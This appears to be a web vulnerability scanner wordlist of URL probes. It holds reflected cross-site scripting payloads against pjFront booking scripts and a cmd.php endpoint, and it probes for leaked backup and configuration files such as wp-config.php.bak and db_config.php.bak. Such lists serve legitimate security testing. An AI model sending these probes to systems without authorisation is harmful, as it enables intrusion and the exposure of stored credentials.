/login.php?secret=
/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=
/index.php.bak
/default.php.bak
/main.php.bak
/config.php.bak
/settings.php.bak
/header.php.bak
/footer.php.bak
/login.php.bak
/database.php.bak
/db.php.bak
/conn.php.bak
/db_config.php.bak
/404.php.bak
/wp-config.php.bak
/wp-login.php.bak
{{filepath}}{{bakext}}
/.php_cs.cache
/_debugbar/open
/login.php/
{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1
{{path}}/index.php?redirect=true&meth=ajax
